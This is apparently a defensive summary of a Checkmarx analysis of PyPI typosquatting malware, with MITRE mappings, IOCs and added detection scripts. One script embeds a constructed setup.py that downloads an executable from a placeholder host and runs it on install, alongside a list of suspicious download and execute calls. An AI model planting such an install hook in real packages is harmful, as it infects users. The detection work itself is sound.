A Checkmarx analysis details a large typosquatting campaign targeting Python's most popular packages that drops Windows malware hosted on GitHub and uses a domain-generation algorithm for C2. The operation also includes DDOS capabilities, anti-sandbox tricks, and persistence via the Windows Startup folder; the write-up provides extensive reverse engineering and IOC disclosure. #devfather777 #jagermager999 #CS1_6 #PythonTyposquatting #Checkmarx
Keypoints
- Typosquatting on PyPI targeted popular Python packages (e.g., idna, flask, docutils) to weaponize installations.
- Malicious PyPI packages execute code at install time to download and run a Windows executable from GitHub.
- The dropped payload persists by copying itself into the Windows Startup folder and installs a root CA certificate.
- The malware uses a Domain Generation Algorithm (DGA) to fetch configuration and later commands from GitHub-hosted files.
- Anti-sandbox checks (sleep loops and performance counters) are built into the malware to evade analysis.
- DDOS capability is built into the malware and is used to direct infected hosts against a Russian Counter-Strike 1.6 server.
- Extensive reverse engineering and IOC disclosure (hashes, URLs, domains) were performed and shared by the researchers.
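The first key point is that the malicious packages were named as small permutations of popular projects. As an added example (not code from the Checkmarx write-up), the following script flags requirement names that are one edit away from a known-good package. The popular-package allowlist and the requirements lines are constructed for illustration; the real malicious package names are not reproduced here.

```python
"""Flag requirement names that are one edit away from a popular PyPI project.

Added example, not code from the Checkmarx write-up. POPULAR_PACKAGES is a
constructed allowlist (the article names idna, flask and docutils among the
impersonated projects); CONSTRUCTED_REQUIREMENTS is a constructed input.
"""
import re

POPULAR_PACKAGES = ["idna", "flask", "docutils", "requests", "urllib3", "numpy", "setuptools"]


def normalize(name):
    """PEP 503 name normalization: lowercase; runs of '-', '_' and '.' become '-'.
    PyPI treats such variants as the same project, so they are not typosquats."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Optimal string alignment distance: one insert, delete, substitute or
    adjacent transposition costs 1. Transpositions are counted so that a
    swapped pair ('flaks' vs 'flask') scores 1, not 2."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[rows - 1][cols - 1]


def typosquat_candidates(name, popular=POPULAR_PACKAGES, max_distance=1):
    """Return [(popular_name, distance)] for popular projects within max_distance
    of `name`. An exact normalized match is the legitimate project and yields []."""
    n = normalize(name)
    hits = []
    for p in popular:
        pn = normalize(p)
        if pn == n:
            return []
        dist = osa_distance(n, pn)
        if dist <= max_distance:
            hits.append((p, dist))
    return sorted(hits, key=lambda t: (t[1], t[0]))


# Leading project name of a requirements.txt line ("flask==2.3.0" -> "flask").
REQ_NAME = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def check_requirements(lines, popular=POPULAR_PACKAGES, max_distance=1):
    """Scan requirements-style lines; return {requested_name: [(popular, dist), ...]}
    for every name that looks like a typosquat. Comments and blank lines are skipped."""
    flagged = {}
    for line in lines:
        m = REQ_NAME.match(line)
        if not m:
            continue
        hits = typosquat_candidates(m.group(1), popular, max_distance)
        if hits:
            flagged[m.group(1)] = hits
    return flagged


# Constructed sample input: three near-miss names mixed with legitimate ones.
CONSTRUCTED_REQUIREMENTS = [
    "# constructed sample requirements.txt",
    "flask==2.3.0",
    "flaks==2.3.0",
    "idan",
    "docutil>=0.18",
    "requests",
    "numpy==1.26.0",
]

if __name__ == "__main__":
    for name, hits in check_requirements(CONSTRUCTED_REQUIREMENTS).items():
        print(f"{name!r} is within one edit of {hits}")
```

Edit distance alone is a coarse signal: four-letter names such as idna sit one edit away from many legitimate projects, so in a real pre-install gate this check should be combined with signals the article's packages would also fail on, such as project age, download count and whether setup.py performs network activity.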
MITRE Techniques
- [T1195] Supply Chain Compromise – ‘The PyPi user account devfather777 published a dozen malicious Typosquatting packages under the names of popular projects with slight permutation.’
- [T1105] Ingress Tool Transfer – ‘the malicious packages contained code executed upon installation which downloads and executes a Windows executable hosted on GitHub’
- [T1059] Command and Scripting Interpreter – ‘the following Python code, embedded in the malicious package’s setup.py file, checks if the victim’s operating system is Windows. If not, it quits and if so, it continues and downloads the file test.exe’
- [T1547.001] Boot or Logon Autostart – ‘Placing itself in the Startup directory makes the malware persistent by executing itself after every reboot’
- [T1497] Virtualization/Sandbox Evasion – ‘anti-sandbox code inside has multiple “sleep” attempts and performance counts measurements’
- [T1483] Domain Generation Algorithms – ‘Domain Generation Algorithm (DGA)’ and the pattern of generated endpoints used for C2/config retrieval
- [T1041] Exfiltration Over C2 Channel – ‘telemetry to a unique generated pixel URL provided by the free legitimate service https://iplogger.org/’
- [T1499] Endpoint Denial of Service – ‘Attack Objective — DDOS’ and the note about targeting a CS1.6 server
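The T1059 entry describes the install-time hook: code in setup.py that checks for Windows, downloads an executable and runs it. As an added example (not code from the Checkmarx report or the malicious packages), the script below statically triages a setup.py with `ast`, resolving aliased imports so that `import urllib.request as ur` or `from subprocess import Popen` cannot hide a call. SAMPLE_SETUP_PY is a constructed file mirroring the described behaviour; it is parsed, never executed, and its URL is a placeholder.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.

Added example, not from the Checkmarx report. SAMPLE_SETUP_PY is a constructed
file that mirrors the behaviour described in the article (OS check, download,
execute); it is only parsed with `ast`, never run, and its URL is a placeholder.
"""
import ast

# Qualified call names worth a second look in a setup.py, by category.
SUSPICIOUS_CALLS = {
    "urllib.request.urlretrieve": "network",
    "urllib.request.urlopen": "network",
    "requests.get": "network",
    "requests.post": "network",
    "subprocess.Popen": "execute",
    "subprocess.run": "execute",
    "subprocess.call": "execute",
    "subprocess.check_output": "execute",
    "os.system": "execute",
    "os.startfile": "execute",
    "os.popen": "execute",
    "platform.system": "os-check",
    "base64.b64decode": "encoding",
    "exec": "dynamic",
    "eval": "dynamic",
}


def _import_aliases(tree):
    """Map local names to qualified ones, e.g. {'Popen': 'subprocess.Popen',
    'ur': 'urllib.request'}, so an aliased import still resolves."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted(node):
    """Rebuild 'a.b.c' from an Attribute/Name chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_setup_py(source):
    """Return [(lineno, qualified_call, category)] for every suspicious call,
    ordered by line number."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name is None:
            continue
        head, _, rest = name.partition(".")
        resolved = aliases.get(head, head) + ("." + rest if rest else "")
        category = SUSPICIOUS_CALLS.get(resolved)
        if category:
            findings.append((node.lineno, resolved, category))
    return sorted(findings)


def verdict(findings):
    """'suspicious' when the file both fetches and executes/evaluates something,
    'review' for any other flagged category, 'clean' otherwise. A bare OS check
    is common in legitimate setup.py files and does not count on its own."""
    cats = {c for _, _, c in findings} - {"os-check"}
    if "network" in cats and ("execute" in cats or "dynamic" in cats):
        return "suspicious"
    return "review" if cats else "clean"


# Constructed sample mirroring the described setup.py; never executed here.
SAMPLE_SETUP_PY = '''\
import platform, subprocess, tempfile
import urllib.request as ur
from setuptools import setup

if platform.system() == "Windows":
    target = tempfile.mktemp(suffix=".exe")
    ur.urlretrieve("https://example.invalid/placeholder", target)  # placeholder URL
    subprocess.Popen([target])

setup(name="constructed-sample", version="0.0.1")
'''

if __name__ == "__main__":
    found = triage_setup_py(SAMPLE_SETUP_PY)
    for lineno, call, category in found:
        print(f"line {lineno}: {call} [{category}]")
    print("verdict:", verdict(found))
```

A wheel-only install policy (`pip install --only-binary :all:`) sidesteps setup.py execution entirely, but the triage above is still useful for source distributions and for reviewing what a sdist would have run.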
Indicators of Compromise
- [Hash] 97053af6922baa9d199a4fa04c461728ac636b8161bd5295c3e847bc0adbe360 – SHA-256 hash of the dropped payload
- [Hash] b209471a23252018d8424139fafcaa8fe7b200ea – SHA-1 hash of the sample, as listed in the IOC set
- [Hash] a2f9c46844fb65c1a71bbd58a484f9f1 – MD5 hash of the sample
- [URL] https://raw.githubusercontent.com/jagermager999/8746465cdg78cdsxasy8a/main/test.txt – Initial configuration file URL used by the malware
- [URL] https://iplogger.org/1RUEV4 – Telemetry/pixel URL used to exfiltrate victim data
- [Domain] raw.githubusercontent.com – Used to host test.txt and main.js (GitHub CDN)
- [Domain] iplogger.org – Telemetry collection service
- [File] test.exe – Windows executable downloaded and executed by the malicious package
- [File] tmp_file_pypi_29x7d0kf8.exe – Temporarily saved filename before execution
- [File Path] C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ppvcc.exe – Startup folder persistence path (path separators restored; `<user>` stands for the victim's profile name)
- [Certificate] Root CA with CN “Some Company” installed system-wide (expired 2020-09-28) – a machine-wide trusted root; the article flags it for persistence and credential-related impact
- [URL] hxxps://raw.githubusercontent.com/ds8xzki890dsq2a1/1/master/main.js – DGA-generated fetch target (defanged in the article)
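As an added example of putting the IOC list above to work (not code from the Checkmarx report), the script below refangs the defanged URL, matches full URLs, filenames and domains against constructed proxy-log lines, and looks up file hashes. It ranks a bare raw.githubusercontent.com hit as low confidence, since that host serves a great deal of benign traffic and only the full repository path is specific to this campaign.

```python
"""Match the article's IOCs against constructed log lines and file hashes.

Added example, not from the Checkmarx report. The IOC values are the ones
listed in the article; CONSTRUCTED_LOG is a constructed input.
"""
import re

IOC_HASHES = {
    "97053af6922baa9d199a4fa04c461728ac636b8161bd5295c3e847bc0adbe360": "sha256",
    "b209471a23252018d8424139fafcaa8fe7b200ea": "sha1",
    "a2f9c46844fb65c1a71bbd58a484f9f1": "md5",
}
IOC_URLS = [
    "https://raw.githubusercontent.com/jagermager999/8746465cdg78cdsxasy8a/main/test.txt",
    "https://iplogger.org/1RUEV4",
    "hxxps://raw.githubusercontent.com/ds8xzki890dsq2a1/1/master/main.js",
]
# Filenames with a confidence level: "test.exe" is generic, the others are not.
IOC_FILENAMES = {"test.exe": "low", "tmp_file_pypi_29x7d0kf8.exe": "high", "ppvcc.exe": "high"}
IOC_DOMAINS = {"raw.githubusercontent.com", "iplogger.org"}
# Shared infrastructure: a bare domain hit here is low fidelity.
SHARED_INFRA_DOMAINS = {"raw.githubusercontent.com"}


def refang(value):
    """Undo common defanging (hxxp -> http, [.] -> .) so IOCs compare to live logs."""
    return re.sub(r"\bhxxp", "http", value, flags=re.IGNORECASE).replace("[.]", ".")


# lowercase refanged URL -> canonical refanged URL (original case preserved)
IOC_URL_INDEX = {refang(u).lower(): refang(u) for u in IOC_URLS}


def scan_log_line(line):
    """Return (ioc_type, confidence, value) tuples for every IOC found in `line`.
    A domain is reported only when no full-URL IOC on that domain already matched."""
    hits = []
    lowered = refang(line).lower()
    for key, url in IOC_URL_INDEX.items():
        if key in lowered:
            hits.append(("url", "high", url))
    for name, confidence in IOC_FILENAMES.items():
        if name in lowered:
            hits.append(("filename", confidence, name))
    for domain in sorted(IOC_DOMAINS):
        if any(t == "url" and domain in v.lower() for t, _, v in hits):
            continue
        pattern = r"(?<![a-z0-9.-])" + re.escape(domain) + r"(?![a-z0-9-])"
        if re.search(pattern, lowered):
            confidence = "low" if domain in SHARED_INFRA_DOMAINS else "medium"
            hits.append(("domain", confidence, domain))
    return hits


def lookup_hash(digest):
    """Return the hash type ('sha256', 'sha1', 'md5') if `digest` is a known IOC."""
    return IOC_HASHES.get(digest.strip().lower())


def triage_log(lines):
    """Return {line_index: hits} for every line with at least one IOC match."""
    result = {}
    for i, line in enumerate(lines):
        hits = scan_log_line(line)
        if hits:
            result[i] = hits
    return result


# Constructed proxy-log lines: two campaign URLs, one benign GitHub fetch, one PyPI fetch.
CONSTRUCTED_LOG = [
    "2024-01-01T10:00:00Z host01 GET https://raw.githubusercontent.com/jagermager999/8746465cdg78cdsxasy8a/main/test.txt 200",
    "2024-01-01T10:00:02Z host01 GET https://iplogger.org/1RUEV4 200",
    "2024-01-01T10:05:00Z host02 GET https://raw.githubusercontent.com/someorg/somerepo/main/README.md 200",
    "2024-01-01T10:06:00Z host03 GET https://pypi.org/simple/flask/ 200",
]

if __name__ == "__main__":
    for idx, hits in triage_log(CONSTRUCTED_LOG).items():
        print(idx, hits)
```

When loading the IOC list into a SIEM, treat the full-URL and hash entries as alertable and the bare domains as context only; the GitHub CDN domain in particular will match ordinary developer traffic.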